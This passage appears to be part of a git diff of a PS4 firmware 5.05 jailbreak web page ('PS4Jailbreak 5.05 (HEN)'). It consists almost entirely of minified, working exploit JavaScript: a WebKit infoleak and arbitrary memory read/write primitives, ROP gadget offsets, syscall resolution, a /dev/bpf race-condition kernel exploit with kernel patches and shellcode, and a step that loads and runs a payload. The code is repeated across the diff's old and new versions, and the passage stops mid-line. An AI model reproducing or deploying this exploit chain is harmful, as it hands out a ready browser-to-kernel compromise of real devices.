butterfly=new int64(hax[2],hax[3]);butterfly.low+=16;tgt.c=leakval_u32;var lkv_u32_old=new int64(hax[4],hax[5]);hax[4]=butterfly.low;hax[5]=butterfly.hi;tgt.c=master;hax[4]=leakval_u32[0];hax[5]=leakval_u32[1];var a2sb=new int64(master[4],master[5]);tgt.c=leakval_u32;hax[4]=lkv_u32_old.low;hax[5]=lkv_u32_old.hi;tgt.c=0;hax=0;var p={write8:function(addr,val){master[4]=addr.low;master[5]=addr.hi;if(val instanceof int64){slave[0]=val.low;slave[1]=val.hi;}else{slave[0]=val;slave[1]=0;};master[4]=a2sb.low;master[5]=a2sb.hi;},write4:function(addr,val){master[4]=addr.low;master[5]=addr.hi;slave[0]=val;master[4]=a2sb.low;master[5]=a2sb.hi;},read8:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=new int64(slave[0],slave[1]);master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},read4:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=slave[0];master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},leakval:function(jsval){leakval_helper[0]=jsval;var rtv=this.read8(butterfly);this.write8(butterfly,new int64(1094795585,4294901760));return rtv;}};var get_jmptgt=function(addr){var z=p.read4(addr)&65535;var y=p.read4(addr.add32(2));if(z!=9727)return 0;return addr.add32(y+6);};var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func);return(p.read8(fptr_store.add32(24))).add32(64);};var parseFloatStore=p.leakfunc(parseFloat);var webKitBase=p.read8(parseFloatStore);webKitBase.low&=4294963200;webKitBase.sub32inplace(5881856-147456);var o2wk=function(o){return webKitBase.add32(o);};for(var gn in gc){if(gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail));libKernelBase.low&=4294963200;libKernelBase.sub32inplace(53248+16384);var wkview=new Uint8Array(4096);var wkstr=p.leakval(wkview).add32(16);p.write8(wkstr,webKitBase);p.write4(wkstr.add32(8),57131008);var hold1;var hold2;var holdz;var holdz1;while(1){hold1={a:0,b:0,c:0,d:0};hold2={a:0,b:0,c:0,d:0};holdz1=p.leakval(hold2);holdz=p.leakval(hold1);if(holdz.low-48==holdz1.low)break;};var pushframe=[];pushframe.length=128;var funcbuf;var funcbuf32=new Uint32Array(256);nogc.push(funcbuf32);var launch_chain=function(chain){var stackPointer=0;var stackCookie=0;var orig_reenter_rip=0;var reenter_help={length:{valueOf:function(){orig_reenter_rip=p.read8(stackPointer);stackCookie=p.read8(stackPointer.add32(8));var returnToFrame=stackPointer;var ocnt=chain.count;chain.push_write8(stackPointer,orig_reenter_rip);chain.push_write8(stackPointer.add32(8),stackCookie);if(chain.runtime)returnToFrame=chain.runtime(stackPointer);chain.push(g.pop_rsp);chain.push(returnToFrame);chain.count=ocnt;p.write8(stackPointer,(g.pop_rsp));p.write8(stackPointer.add32(8),chain.stackBase);}}};funcbuf=p.read8(p.leakval(funcbuf32).add32(16));p.write8(funcbuf.add32(48),g.setjmp);p.write8(funcbuf.add32(128),g.jop);p.write8(funcbuf,funcbuf);p.write8(parseFloatStore,g.jop);var orig_hold=p.read8(holdz1);var orig_hold48=p.read8(holdz1.add32(72));p.write8(holdz1,funcbuf.add32(80));p.write8(holdz1.add32(72),funcbuf);parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);p.write8(holdz1,orig_hold);p.write8(holdz1.add32(72),orig_hold48);stackPointer=p.read8(funcbuf.add32(16));rtv=Array.prototype.splice.apply(reenter_help);return p.leakval(rtv);};p.loadchain=launch_chain;var kview=new Uint8Array(4096);var kstr=p.leakval(kview).add32(16);p.write8(kstr,libKernelBase);p.write4(kstr.add32(8),262144);var countbytes;for(var i=0;i<262144;i++){if(kview[i]==114&&kview[i+1]==100&&kview[i+2]==108&&kview[i+3]==111&&kview[i+4]==99){countbytes=i;break;};};p.write4(kstr.add32(8),countbytes+32);var dview32=new Uint32Array(1);var dview8=new Uint8Array(dview32.buffer);for(var i=0;i<countbytes;i++){if(kview[i]==72&&kview[i+1]==199&&kview[i+2]==192&&kview[i+7]==73&&kview[i+8]==137&&kview[i+9]==202&&kview[i+10]==15&&kview[i+11]==5){dview8[0]=kview[i+3];dview8[1]=kview[i+4];dview8[2]=kview[i+5];dview8[3]=kview[i+6];var syscallno=dview32[0];s[syscallno]=libKernelBase.add32(i);};};var chain=new rop();var returnvalue;p.fcall_=function(rip,rdi,rsi,rdx,rcx,r8,r9){chain.clear();chain.notimes=this.next_notime;this.next_notime=1;chain.fcall(rip,rdi,rsi,rdx,rcx,r8,r9);chain.push(g.pop_rdi);chain.push(chain.stackBase.add32(16376));chain.push(g.mov__rdi__rax);chain.push(g.pop_rax);chain.push(p.leakval(1094795842));if(chain.run().low!=1094795842){throw new Error("unexpected rop behaviour");};returnvalue=p.read8(chain.stackBase.add32(16376));};p.fcall=function(){p.fcall_.apply(this,arguments);return returnvalue;};p.readstr=function(addr){var addr_=addr.add32(0);var rd=p.read4(addr_);var buf="";while(rd&255){buf+=String.fromCharCode(rd&255);addr_.add32inplace(1);rd=p.read4(addr_);};return buf;};p.syscall=function(sysc,rdi,rsi,rdx,rcx,r8,r9){if(typeof sysc!="number"){throw new Error("invalid syscall");};var off=s[sysc];if(off==undefined){throw new Error("invalid syscall");};return p.fcall(off,rdi,rsi,rdx,rcx,r8,r9);};p.sptr=function(str){var bufView=new Uint8Array(str.length+1);for(var i=0;i<str.length;i++){bufView[i]=str.charCodeAt(i)&255;};nogc.push(bufView);return p.read8(p.leakval(bufView).add32(16));};p.malloc=function(sz){var backing=new Uint8Array(65536+sz);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=backing;return ptr;};p.malloc32=function(sz){var backing=new Uint8Array(65536+sz*4);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=new Uint32Array(backing.buffer);return ptr;};var test=p.syscall(23,0);if(test!="0"){var fd=p.syscall(5,p.sptr("/dev/bpf0"),2).low;var fd1=p.syscall(5,p.sptr("/dev/bpf0"),2).low;if(fd==(-1>>>0)){throw new Error("open bpf fail");};var bpf_valid=p.malloc32(16384);var bpf_spray=p.malloc32(16384);var bpf_valid_u32=bpf_valid.backing;var bpf_valid_prog=p.malloc(64);p.write8(bpf_valid_prog,2048/8);p.write8(bpf_valid_prog.add32(8),bpf_valid);var bpf_spray_prog=p.malloc(64);p.write8(bpf_spray_prog,2048/8);p.write8(bpf_spray_prog.add32(8),bpf_spray);for(var i=0;i<1024;){bpf_valid_u32[i++]=6;bpf_valid_u32[i++]=0;};var rtv=p.syscall(54,fd,2148549243,bpf_valid_prog);if(rtv.low!=0){throw new Error("ioctl bpf fail");};var spawnthread=function(name,chain){var longjmp=webKitBase.add32(5352);var createThread=webKitBase.add32(7836560);var contextp=p.malloc32(8192);var contextz=contextp.backing;contextz[0]=1337;var thread2=new rop();thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);chain(thread2);p.write8(contextp,g.ret);p.write8(contextp.add32(16),thread2.stackBase);p.syscall(324,1);var retv=function(){p.fcall(createThread,longjmp,contextp,p.sptr(name));};nogc.push(contextp);nogc.push(thread2);return retv;};var interrupt1,loop1;var sock=p.syscall(97,2,2);var kscratch=p.malloc32(4096);var start1=spawnthread("GottaGoFast",function(thread2){interrupt1=thread2.stackBase;thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.pop_rdi);thread2.push(fd);thread2.push(g.pop_rsi);thread2.push(2148549243);thread2.push(g.pop_rdx);thread2.push(bpf_valid_prog);thread2.push(g.pop_rsp);thread2.push(thread2.stackBase.add32(2048));thread2.count=256;var cntr=thread2.count;thread2.push(s[54]);thread2.push_write8(thread2.stackBase.add32(cntr*8),s[54]);thread2.push(g.pop_rdi);var wherep=thread2.pushSymbolic();thread2.push(g.pop_rsi);var whatp=thread2.pushSymbolic();thread2.push(g.mov__rdi__rsi);thread2.push(g.pop_rsp);loop1=thread2.stackBase.add32(thread2.count*8);thread2.push(1094795585);thread2.finalizeSymbolic(wherep,loop1);thread2.finalizeSymbolic(whatp,loop1.sub32(8));});var krop=new rop();var race=new rop();var ctxp=p.malloc32(8192);var ctxp1=p.malloc32(8192);var ctxp2=p.malloc32(8192);p.write8(bpf_spray.add32(16),ctxp);p.write8(ctxp.add32(80),0);p.write8(ctxp.add32(104),ctxp1);var stackshift_from_retaddr=0;p.write8(ctxp1.add32(16),o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(ctxp.add32(0),ctxp2);p.write8(ctxp.add32(16),ctxp2.add32(8));p.write8(ctxp2.add32(2000),o2wk(7271653));var iterbase=ctxp2;for(var i=0;i<15;i++){p.write8(iterbase,o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(iterbase.add32(2000+32),o2wk(7271653));p.write8(iterbase.add32(8),iterbase.add32(32));p.write8(iterbase.add32(24),iterbase.add32(32+8));iterbase=iterbase.add32(32);};var raxbase=iterbase;var rdibase=iterbase.add32(8);var memcpy=get_jmptgt(webKitBase.add32(248));memcpy=p.read8(memcpy);p.write8(raxbase,o2wk(22848539));stackshift_from_retaddr+=8;p.write8(rdibase.add32(112),o2wk(19417140));stackshift_from_retaddr+=8;p.write8(rdibase.add32(24),rdibase);p.write8(rdibase.add32(8),krop.stackBase);p.write8(raxbase.add32(48),g.mov_rbp_rsp);p.write8(rdibase,raxbase);p.write8(raxbase.add32(1056),o2wk(2566497));p.write8(raxbase.add32(64),memcpy.add32(194-144));var topofchain=stackshift_from_retaddr+40;p.write8(rdibase.add32(176),topofchain);for(var i=0;i<4096/8;i++){p.write8(krop.stackBase.add32(i*8),g.ret);};krop.count=16;var kpatch=function(offset,qword){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.pop_rsi);krop.push(qword);krop.push(g.mov__rax__rsi);};var kpatch2=function(offset,offset2){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset2);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);};p.write8(kscratch.add32(1056),g.pop_rdi);p.write8(kscratch.add32(64),g.pop_rax);p.write8(kscratch.add32(24),kscratch);krop.push(g.pop_rdi);krop.push(kscratch.add32(24));krop.push(g.mov_rbp_rsp);var rboff=topofchain-krop.count*8+40;krop.push(o2wk(2566497));krop.push(g.pop_rax);krop.push(rboff);krop.push(g.add_rdi_rax);krop.push(g.mov_rax__rdi__);krop.push(g.pop_rsi);krop.push(762);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);var shellbuf=p.malloc32(4096);krop.push(g.pop_rdi);krop.push(kscratch);krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(808116);krop.push(g.add_rax_rsi);krop.push(g.pop_rdi);krop.push(kscratch.add32(8));krop.push(g.mov__rdi__rax);krop.push(g.jmp_rax);krop.push(g.pop_rdi);krop.push(kscratch.add32(16));krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(new int64(4294901759,4294967295));krop.push(g.and_rax_rsi);krop.push(g.mov_rdx_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.mov_rax_rdx);krop.push(g.jmp_rdi);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(221338);krop.push(g.add_rax_rsi);krop.push(g.mov_rax__rax__);krop.push(g.pop_rdi);krop.push(kscratch.add32(816));krop.push(g.mov__rdi__rax);kpatch(221338,new int64(2425420344,2425393296));kpatch(20169540,shellbuf);kpatch(new int64(4293816070,4294967295),new int64(184,3297329408));kpatch(new int64(4293470503,4294967295),new int64(0,1082624841));kpatch(new int64(4293470533,4294967295),new int64(2425388523,1922076816));kpatch(new int64(4294769332,4294967295),new int64(934690871,826654769));kpatch(828366,new int64(115177,2336788480));kpatch(1329844,new int64(2428747825,2425393296));kpatch(new int64(15789236,0),new int64(2,0));kpatch2(new int64(15789244,0),new int64(4293548276,4294967295));kpatch(new int64(15789276,0),new int64(0,1));krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(16));krop.push(g.mov_rax__rax__);krop.push(g.jmp_rdi);krop.push(o2wk(380345));krop.push(kscratch.add32(4096));var kq=p.malloc32(16);var kev=p.malloc32(256);kev.backing[0]=sock;kev.backing[2]=131071;kev.backing[3]=1;kev.backing[4]=5;var shcode=[35817,2425393152,2425393296,2425393296,8567125,2303246336,1096172005,1398030677,2303275535,3149957588,256,551862601,1220806985,9831821,2370371584,4265616532,2370699263,3767542964,2370633744,1585456300,2169045059,1265721540,277432321,4202255,698,3867757568,524479,3607052544,960335176,1207959552,3224487561,2211839809,3698655723,1103114587,1096630620,2428722526,1032669269,4294967160,2303260209,15293925,1207959552,770247,2303262720,3271888842,1818324331,979595116,628633632,1815490864,2648,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(var i=0;i<shcode.length;i++){shellbuf.backing[i]=shcode[i];};start1();while(1){race.count=0;race.push(s[362]);race.push(g.pop_rdi);race.push(kq);race.push(g.mov__rdi__rax);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push_write8(loop1,interrupt1);race.push(g.pop_rdi);race.push(fd);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_valid_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(g.pop_rsi);race.push(kev);race.push(g.pop_rdx);race.push(1);race.push(g.pop_rcx);race.push(0);race.push(g.pop_r8);race.push(0);race.push(s[363]);race.push(g.pop_rdi);race.push(fd1);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_spray_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(s[6]);race.run();if(kscratch.backing[0]!=0){p.syscall(74,shellbuf,16384,7);p.fcall(shellbuf);break;};};};var createThread=webKitBase.add32(7836560);var payloadbuf=p.malloc32(16384);###for(var i=0;i<payload.length;i++){payloadbuf.backing[i]=payload[i];};p.syscall(74,payloadbuf,65536,7);p.syscall(324,1);p.fcall(createThread,payloadbuf,0,p.sptr("payload"));alert("All done! Have fun with Homebrew!");done();}</script></body></html>
\ No newline at end of file
diff --git a/exploit/index.html b/exploit/index.html
index c01966e..4956b12 100644
--- a/exploit/index.html
+++ b/exploit/index.html
@@ -1 +1 @@
-<!DOCTYPE html><html><head><title>PS4Jailbreak 5.05 (HEN)</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li><a href=#>SiSTRo</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};return new int64(new_lo,new_hi);};this.add32inplace=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};this.hi=new_hi;this.low=new_lo;};this.sub32=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};return new int64(new_lo,new_hi);};this.sub32inplace=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};this.hi=new_hi;this.low=new_lo;};this.toString=function(val){val=16;var lo_str=(this.low>>>0).toString(val);var hi_str=(this.hi>>>0).toString(val);if(this.hi==0)return lo_str;else{lo_str=zeroFill(lo_str,8);};return hi_str+lo_str;};return this;};var nogc=[];var tgt={a:0,b:0,c:0,d:0};var y=new ImageData(1,16384);postMessage("","*",[y.data.buffer]);var props={};for(var i=0;i<16384/2;){props[i++]={value:1111638594};props[i++]={value:tgt};};var foundLeak=undefined;var foundIndex=0;var maxCount=256;while(foundLeak==undefined&&maxCount>0){maxCount--;history.pushState(y,"");Object.defineProperties({},props);var leak=new Uint32Array(history.state.data.buffer);for(var i=0;i<leak.length-6;i++){if(leak[i]==1111638594&&leak[i+1]==4294901760&&leak[i+2]==0&&leak[i+3]==0&&leak[i+4]==0&&leak[i+5]==0&&leak[i+6]==14&&leak[i+7]==0&&leak[i+10]==0&&leak[i+11]==0&&leak[i+12]==0&&leak[i+13]==0&&leak[i+14]==14&&leak[i+15]==0){foundIndex=i;foundLeak=leak;break;};};};if(!foundLeak){throw new Error("infoleak fail");};Array.prototype.__defineGetter__(100,()=>1);var firstLeak=Array.prototype.slice.call(foundLeak,foundIndex,foundIndex+64);var leakJSVal=new int64(firstLeak[8],firstLeak[9]);var f=document.body.appendChild(document.createElement("iframe"));var a=new f.contentWindow.Array(13.37,13.37);var b=new f.contentWindow.Array(u2d(leakJSVal.low+16,leakJSVal.hi),13.37);var master=new Uint32Array(4096);var slave=new Uint32Array(4096);var leakval_u32=new Uint32Array(4096);var leakval_helper=[slave,2,3,4,5,6,7,8,9,10];tgt.a=u2d(2048,23077632);tgt.b=0;tgt.c=leakval_helper;tgt.d=4919;var c=Array.prototype.concat.call(a,b);document.body.removeChild(f);var hax=c[0];c[0]=0;tgt.c=c;hax[2]=0;hax[3]=0;Object.defineProperty(Array.prototype,100,{get:undefined});tgt.c=leakval_helper;var butterfly=new int64(hax[2],hax[3]);butterfly.low+=16;tgt.c=leakval_u32;var lkv_u32_old=new int64(hax[4],hax[5]);hax[4]=butterfly.low;hax[5]=butterfly.hi;tgt.c=master;hax[4]=leakval_u32[0];hax[5]=leakval_u32[1];var a2sb=new int64(master[4],master[5]);tgt.c=leakval_u32;hax[4]=lkv_u32_old.low;hax[5]=lkv_u32_old.hi;tgt.c=0;hax=0;var p={write8:function(addr,val){master[4]=addr.low;master[5]=addr.hi;if(val instanceof int64){slave[0]=val.low;slave[1]=val.hi;}else{slave[0]=val;slave[1]=0;};master[4]=a2sb.low;master[5]=a2sb.hi;},write4:function(addr,val){master[4]=addr.low;master[5]=addr.hi;slave[0]=val;master[4]=a2sb.low;master[5]=a2sb.hi;},read8:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=new int64(slave[0],slave[1]);master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},read4:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=slave[0];master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},leakval:function(jsval){leakval_helper[0]=jsval;var rtv=this.read8(butterfly);this.write8(butterfly,new int64(1094795585,4294901760));return rtv;}};var get_jmptgt=function(addr){var z=p.read4(addr)&65535;var y=p.read4(addr.add32(2));if(z!=9727)return 0;return addr.add32(y+6);};var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func);return(p.read8(fptr_store.add32(24))).add32(64);};var parseFloatStore=p.leakfunc(parseFloat);var webKitBase=p.read8(parseFloatStore);webKitBase.low&=4294963200;webKitBase.sub32inplace(5881856-147456);var o2wk=function(o){return webKitBase.add32(o);};for(var gn in gc){if(gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail));libKernelBase.low&=4294963200;libKernelBase.sub32inplace(53248+16384);var wkview=new Uint8Array(4096);var wkstr=p.leakval(wkview).add32(16);p.write8(wkstr,webKitBase);p.write4(wkstr.add32(8),57131008);var hold1;var hold2;var holdz;var holdz1;while(1){hold1={a:0,b:0,c:0,d:0};hold2={a:0,b:0,c:0,d:0};holdz1=p.leakval(hold2);holdz=p.leakval(hold1);if(holdz.low-48==holdz1.low)break;};var pushframe=[];pushframe.length=128;var funcbuf;var funcbuf32=new Uint32Array(256);nogc.push(funcbuf32);var launch_chain=function(chain){var stackPointer=0;var stackCookie=0;var orig_reenter_rip=0;var reenter_help={length:{valueOf:function(){orig_reenter_rip=p.read8(stackPointer);stackCookie=p.read8(stackPointer.add32(8));var returnToFrame=stackPointer;var ocnt=chain.count;chain.push_write8(stackPointer,orig_reenter_rip);chain.push_write8(stackPointer.add32(8),stackCookie);if(chain.runtime)returnToFrame=chain.runtime(stackPointer);chain.push(g.pop_rsp);chain.push(returnToFrame);chain.count=ocnt;p.write8(stackPointer,(g.pop_rsp));p.write8(stackPointer.add32(8),chain.stackBase);}}};funcbuf=p.read8(p.leakval(funcbuf32).add32(16));p.write8(funcbuf.add32(48),g.setjmp);p.write8(funcbuf.add32(128),g.jop);p.write8(funcbuf,funcbuf);p.write8(parseFloatStore,g.jop);var orig_hold=p.read8(holdz1);var orig_hold48=p.read8(holdz1.add32(72));p.write8(holdz1,funcbuf.add32(80));p.write8(holdz1.add32(72),funcbuf);parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);p.write8(holdz1,orig_hold);p.write8(holdz1.add32(72),orig_hold48);stackPointer=p.read8(funcbuf.add32(16));rtv=Array.prototype.splice.apply(reenter_help);return p.leakval(rtv);};p.loadchain=launch_chain;var kview=new Uint8Array(4096);var kstr=p.leakval(kview).add32(16);p.write8(kstr,libKernelBase);p.write4(kstr.add32(8),262144);var countbytes;for(var i=0;i<262144;i++){if(kview[i]==114&&kview[i+1]==100&&kview[i+2]==108&&kview[i+3]==111&&kview[i+4]==99){countbytes=i;break;};};p.write4(kstr.add32(8),countbytes+32);var dview32=new Uint32Array(1);var dview8=new Uint8Array(dview32.buffer);for(var i=0;i<countbytes;i++){if(kview[i]==72&&kview[i+1]==199&&kview[i+2]==192&&kview[i+7]==73&&kview[i+8]==137&&kview[i+9]==202&&kview[i+10]==15&&kview[i+11]==5){dview8[0]=kview[i+3];dview8[1]=kview[i+4];dview8[2]=kview[i+5];dview8[3]=kview[i+6];var syscallno=dview32[0];s[syscallno]=libKernelBase.add32(i);};};var chain=new rop();var returnvalue;p.fcall_=function(rip,rdi,rsi,rdx,rcx,r8,r9){chain.clear();chain.notimes=this.next_notime;this.next_notime=1;chain.fcall(rip,rdi,rsi,rdx,rcx,r8,r9);chain.push(g.pop_rdi);chain.push(chain.stackBase.add32(16376));chain.push(g.mov__rdi__rax);chain.push(g.pop_rax);chain.push(p.leakval(1094795842));if(chain.run().low!=1094795842){throw new Error("unexpected rop behaviour");};returnvalue=p.read8(chain.stackBase.add32(16376));};p.fcall=function(){p.fcall_.apply(this,arguments);return returnvalue;};p.readstr=function(addr){var addr_=addr.add32(0);var rd=p.read4(addr_);var buf="";while(rd&255){buf+=String.fromCharCode(rd&255);addr_.add32inplace(1);rd=p.read4(addr_);};return buf;};p.syscall=function(sysc,rdi,rsi,rdx,rcx,r8,r9){if(typeof sysc!="number"){throw new Error("invalid syscall");};var off=s[sysc];if(off==undefined){throw new Error("invalid syscall");};return p.fcall(off,rdi,rsi,rdx,rcx,r8,r9);};p.sptr=function(str){var bufView=new Uint8Array(str.length+1);for(var i=0;i<str.length;i++){bufView[i]=str.charCodeAt(i)&255;};nogc.push(bufView);return p.read8(p.leakval(bufView).add32(16));};p.malloc=function(sz){var backing=new Uint8Array(65536+sz);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=backing;return ptr;};p.malloc32=function(sz){var backing=new Uint8Array(65536+sz*4);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=new Uint32Array(backing.buffer);return ptr;};var test=p.syscall(23,0);if(test!="0"){var fd=p.syscall(5,p.sptr("/dev/bpf0"),2).low;var fd1=p.syscall(5,p.sptr("/dev/bpf0"),2).low;if(fd==(-1>>>0)){throw new Error("open bpf fail");};var bpf_valid=p.malloc32(16384);var bpf_spray=p.malloc32(16384);var bpf_valid_u32=bpf_valid.backing;var bpf_valid_prog=p.malloc(64);p.write8(bpf_valid_prog,2048/8);p.write8(bpf_valid_prog.add32(8),bpf_valid);var bpf_spray_prog=p.malloc(64);p.write8(bpf_spray_prog,2048/8);p.write8(bpf_spray_prog.add32(8),bpf_spray);for(var i=0;i<1024;){bpf_valid_u32[i++]=6;bpf_valid_u32[i++]=0;};var rtv=p.syscall(54,fd,2148549243,bpf_valid_prog);if(rtv.low!=0){throw new Error("ioctl bpf fail");};var spawnthread=function(name,chain){var longjmp=webKitBase.add32(5352);var createThread=webKitBase.add32(7836560);var contextp=p.malloc32(8192);var contextz=contextp.backing;contextz[0]=1337;var thread2=new rop();thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);chain(thread2);p.write8(contextp,g.ret);p.write8(contextp.add32(16),thread2.stackBase);p.syscall(324,1);var retv=function(){p.fcall(createThread,longjmp,contextp,p.sptr(name));};nogc.push(contextp);nogc.push(thread2);return retv;};var interrupt1,loop1;var sock=p.syscall(97,2,2);var kscratch=p.malloc32(4096);var start1=spawnthread("GottaGoFast",function(thread2){interrupt1=thread2.stackBase;thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.pop_rdi);thread2.push(fd);thread2.push(g.pop_rsi);thread2.push(2148549243);thread2.push(g.pop_rdx);thread2.push(bpf_valid_prog);thread2.push(g.pop_rsp);thread2.push(thread2.stackBase.add32(2048));thread2.count=256;var cntr=thread2.count;thread2.push(s[54]);thread2.push_write8(thread2.stackBase.add32(cntr*8),s[54]);thread2.push(g.pop_rdi);var wherep=thread2.pushSymbolic();thread2.push(g.pop_rsi);var 